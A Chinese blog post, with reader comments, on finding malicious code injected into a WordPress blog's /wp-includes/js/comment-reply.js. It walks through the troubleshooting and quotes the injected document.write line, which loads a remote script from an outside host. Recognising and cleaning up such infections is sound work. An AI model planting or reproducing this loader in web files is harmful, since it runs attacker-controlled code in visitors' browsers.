插入 comment-reply.js 的恶意 js 代码

» 2012-03-05 64条评论

今天有个朋友找我,说他的博客打开文章页就弹出如下图所示登陆框:点击取消就能打开文章页。

插入 comment-reply.js 的恶意 js 代码

这很蛋疼,好好的博客被插,朋友也咨询了新网客服,得到答复就是“被插”,而且不是他一个人的博客被插,很多人都有类似情况。

既然朋友找我,那么就要帮忙一下了。我用 Firebug 查看,发现文章页被引用一个 js 文件,这个 js 文件如下图:

我查看了主题代码,没有发现引用此 js 文件的代码。然后我尝试把所有插件停止,问题依旧。

继续,因为 js 文件是被引用在 header 里,所以可以肯定是自动插入的,自动在 WordPress 的 header.php 引用 js 文件,那么肯定就是 wp_head() 函数。

于是我删了 wp_head(),那个弹窗就没了。说明我的判断没错,但是问题是哪里引用的呢? functions.php 里面没有,插件全部停止了,那么下一步的判断就是 js 文件。我重新吧 wp_head() 函数放上,然后把主题里面引用的 js 都去掉了,问题依旧。再用 Firebug 查看,发现 comment-reply.js 被引用,除了它就是刚才上面第二张图片显示的 js,那么现在可以肯定问题出在 comment-reply.js,但 header.php 里面的 comment-reply.js 调用函数我屏蔽了啊?我再仔细看了一下 functions.php,原来我这个朋友的主题的 functions.php 里面也有一个 comment-reply.js 调用函数!Orz!

我用 ftp 然后用 notepad++ 打开 comment-reply.js 一看,嚯嚯,恶意代码原形毕露:

document.write(unescape("%3Cscript src='http://bijioc.googlecode.com/svn/trunk/js/navigatenormal.js?v="+(new Date().toDateString().replace(/\s/g, ''))+".js' type='text/javascript'%3E%3C/script%3E"));

厉害,竟然想到隐藏在这里!

好吧,说了这么多废话,就是说文章标题而已,主要是提醒朋友注意了,发现类似情况不用抓头了,直接看 /wp-includes/js/comment-reply.js 吧。

zww
or
oooo

“插入 comment-reply.js 的恶意 js 代码”有64条评论

  1. Kayo says:

    开源的项目容易受安全问题困扰,WP自然也是跑不掉了,大家注意检查一下!

    1. zwwooooo says:

      @Kayo
      使用者自行注意

  2. 八方SEO says:

    我的主题也会被杀软误报,也是JS,文章页里面的评论,不知道哪个出问题了

    1. zwwooooo says:

      @八方SEO
      这要自己查看误报的js内容了。

  3. 标注下,以后万一碰到了知道怎么搞。

  4. Louis Han says:

    嗯 没有洞的地方都可能会被插啊

    1. zwwooooo says:

      @Louis Han
      心术不正者神马都插

  5. 现在的评论框都这么炫。。

    1. eRic says:

      @蓝色离子
      我也觉得。。

  6. 郑永 says:

    现在病毒换着花样玩,都玩到wordpress了

    1. zwwooooo says:

      @郑永
      受荒淫就容易攻击了

    2. zwwooooo says:

      @郑永
      你的博客大不开了……

    3. 郑永 says:

      @zwwooooo
      正常打开,测试没有被墙,你再帮我试试吧,不可能你连国内都墙吧。

    4. zwwooooo says:

      @郑永
      可能那天是抽风,现在可以打开了。对了,你在我这的评论的昵称乱码了,可能跟我前几天试用缓存有关,我手动帮你改过了,下次请你更正下。

  7. 郑永 says:

    呵呵,现在应该不乱码了,原来是我的浏览器刚换的原因吗?

    1. zwwooooo says:

      @郑永
      不是你的问题,是前几天我测试一个缓存插件造成的

  8. junjun says:

    我好像以前也遇到过这个问题,忘记是不是在博客上了,好像是访问别人的博客的时候遇到的。前段时间我的博客也中毒了,打开就警告,后台好多乱七八糟的代码,删除后,好像好了,但是访问速度超级慢。刚才看kevin同学的博客,好像又中招了 :arrow: 估计我的也中了

    1. zwwooooo says:

      @junjun
      看来你的主机被入侵了……

  9. junjun says:

    好嘛,我刚看了果然中招了,模板每个页面都被加了一堆乱七八糟的代码 :arrow:

    1. zwwooooo says:

      @junjun
      全新安装吧……

  10. TRIZ says:

    是啊,很多网站都是插件上面出问题!

  11. Normal says:

    真厉害,我目前还是个新手,只用免费的服务器折腾一下。如果做好了准备换个稳定的空间。

回复给 Kayo ¬
取消回复

昵称 *

网址

B em del U Link Code Quote